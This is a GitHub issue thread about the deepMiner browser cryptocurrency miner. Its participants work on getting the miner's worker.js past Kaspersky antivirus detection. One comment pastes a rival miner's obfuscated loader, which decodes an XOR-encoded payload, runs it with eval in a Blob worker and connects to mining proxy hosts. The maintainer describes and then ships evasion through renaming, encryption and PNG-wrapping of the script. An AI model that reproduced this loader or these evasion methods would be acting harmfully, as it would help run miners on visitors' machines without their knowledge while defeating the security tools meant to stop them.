### ISSUE TITLE
Wrapping worker.js with WASM

### ISSUE THREAD

**Issue by emiralp** [deepwn/deepMiner#28]
I am having problems with Kaspersky Anti Virus while trying demo.html, I try to investigate CoinHive and it loads worker.js without any problems with WASM, i think. Has anyone encountered same problem? Or any workarounds?

**Comment by emiralp** [comment]
First it alerted with deepMiner.js but I obscure it and it worked. Then when try to xhr.open worker.js Kaspersky alerts: Thread found at worker.js as HEUR trojan script

**Comment by evil7** [comment]
Have you run `git pull` to update your clone to the new?
Locally testing? OR testing with `https://deep.cc/demo.html`?
I had update this project yesterday for a security problem.
This project start with debug coinhive's codes. And you can see first push in 10 Oct. And bad news at Oct.

News in 24 Oct: 
CoinHive.com be hijacked: <https://thehackernews.com/2017/10/coinhive-cryptocurrency-miner.html>

Whatever is that true or not. That wasm can't use OS API to hacking users. Just can made users mining for this hacker in same way user mining with JS.

Thx for feedback I'll check it again. find out an answer was that I missing checked some parts.

**Comment by emiralp** [comment]
Trying with updated clone, and result is the same. Kaspersky is not trusting to worker.js and returns 499 error. Also I have checked CoinImp.com(https://www.hashing.win/scripts/min.js) source, they added worker.js inside their client javascript code as obscured and running directly as new Blob(), without xhr request.

**Comment by JBelinchon** [comment]
@emiralp It happend the same to me, deepMiner.js is easy to ofuscate to avoid karpesky, but worker.js is been more complex. I still did not getting working.

**Comment by bitcointime** [comment]
I am looking for the answer as well. Any update guys?

**Comment by evil7** [comment]
Checking and update soon.
Don't worry I have a hacker team 50+ geek developer here.
I'll push a awesome add-on updating for this. EZ bypass.

If you wanna check the part for how will I do the crypto, check this: <https://evil7.github.io/pngCrypto.js/>

try fixing in an hour. have a coffee and wait on please. guys. :)

![](http://img.mp.itc.cn/upload/20160909/6c4d4f3e32c64e279179e2ea1cfcc23f_th.gif)

**Comment by emiralp** [comment]
pngCrypto sounds interesting.. Also, maybe this will lead you guys somewhere (from coinimps source)?
`self['Client']['CONFIG']=
	{
	'LIB_URL':'https://www.hashing.win/scripts/','ASMJS_NAME':'cn-asmjs.min.js','REQUIRES_AUTH':![],'WEBSOCKET_SHARDS':[['wss://chainblock.science:80/proxy','wss://chainblock.science:443/proxy','wss://hodlers.party:80/proxy','wss://hodlers.party:443/proxy','wss://hodling.faith:80/proxy','wss://hodling.faith:443/proxy']]
};
Client['CRYPTONIGHT_WORKER_BLOB']=URL['createObjectURL'](new Blob(["var v=\"cpgj\\x2e`sheroih\\x2ev\\x2ag\\x2ae\\x2am\\x2ac\\x2ab\\x2f
}
c;
`sheroih\\x2ee\\x2f
}
tcrsth\\x2ee:g9\\x21\\x21<c\\x2evgtucOhr\\x2ee\\x29g\\x2f\\x2f\\x2f\\x2d\\x2e\\x2ee;
e\\x23g\\x2f8539Urtoha\\x28`tikEngtEibc\\x2ee\\x2d4?\\x2f<e\\x28riUrtoha\\x2e50\\x2f\\x2f
..................................
zKsjronivz772z773zRt\\x7fohaz764z770z~46ohpgjobz~46joduz~46d\\x7frczisrz~46uceroihzjodz~46ucwscheczGeecuuohaz~46hccbcbz~46geecuuz~46enghacbzUrtcgkuzTckircz~46suctuz~46hihz767z~46`ihrzuiemcrzBcurohgroihz~46showsczKcuugacz~46qtihaz~46jiazAopchz766z~46ohrct`gecz~46bc`ohcbz~46eih`oastcbzPgjscz~46vtiatcuuz774zUrgjczc~cez756zIsrzVtcpoisuz~46iqhctz~46bocbz~46c~votcbz757zRokctzUrgrcz~46tceipctgdjcz~46oiz~46bcjg\\x7fzjgurOhbc~I`z~46eghecjcbzc~rhgkcz~46urtcgkzR\\x7fvcCttitzBcpoeczGtaskchruz~46urtohauzY6~27>407zY6~55644>zY6~47d50cz~46`krzY6~7>4?2?zqoh54z~46urtcgkuz~46c~cez~46tcuistecuzEikkshoegroihzWsirgzGbpctrouczIvctgroihz~46nguz744z745z~46c~eccbcbzUtkishrz~46kcboskz~46ohurgjjcbzKgenohczVgemgacz~46btopcz~46rgvcz~46ucpctcbz~46tckirc\\x21\\x28uvjor\\x2e\\x21z\\x21\\x2f\\x2a6\\x2a
}
{
\\x2f\\x2f\\x0c\";
function f(a)
	{
	var r=\"\";
	for(var i=0;
	i<a.length;
	i++)
		{
		r+=String.fromCharCode(0x06^a.charCodeAt(i));
	}
	return r;
}
v=f(v);
eval(v)"]));
`

**Comment by evil7** [comment]
That's just `random name + zip + crypto` to bypass AV, but not will be long time to hold this.
If AV update from Regex rules to a function-checker, U know what will happen next...
I will use `random the vars and function's name` and some normal plan too, and mix this pngCrypto in to trans JS file like a PNG file.
If do a bypass patch, Do more future and complete, one shoot all kill :)
it's more funny to try `hard mode` in developing by myself.

**Comment by bitcointime** [comment]
No quick fix for that? Anybody working on it or shall we try to solve it ourselves?

**Comment by evil7** [comment]
UPDATE:
AES support for bypass AV.
Hey guys. Let's say hi to Kaspersky :)
I do NOT wanna install one of Kaspersky in my PC.
So test it for me please.

**Comment by evil7** [comment]
Solved and Closed now.
